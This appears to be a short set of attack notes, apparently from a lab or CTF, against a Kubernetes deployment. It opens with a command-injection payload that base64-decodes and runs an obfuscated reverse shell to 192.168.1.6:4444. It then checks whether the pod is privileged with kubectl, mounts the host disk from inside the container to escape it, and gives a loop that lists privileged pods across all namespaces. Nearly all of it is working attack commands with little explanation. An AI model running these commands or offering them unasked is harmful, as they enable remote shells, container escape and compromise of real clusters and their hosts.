Easy command breakout
192.168.1.6; echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjYvNDQ0NCAwPiYx | base64 -d | bash
Enumerate privileged container
# hostname
health-check-deployment-f9d6f6f9c-59w8r
┌──(root㉿kali)-[~]
└─# kubectl get pod health-check-deployment-f9d6f6f9c-59w8r -o json | jq -r '.spec.containers[].securityContext.privileged'
true
We can mount ourselves to the host filesystem
# mount /dev/sda2 /tmp/bruh
haha i spent 40 mins writing this
while read i ; do echo -n "$(echo $i | awk '{print "pod: "$3", namespace: "$2}'), privileged:" ; bash -c "kubectl get pod $i -o json" | jq -r '.spec.containers[].securityContext.privileged' ; done <=(kubectl get pod -o wide -A | awk '{print "-n " $1 " " $2}' | tail -n +2)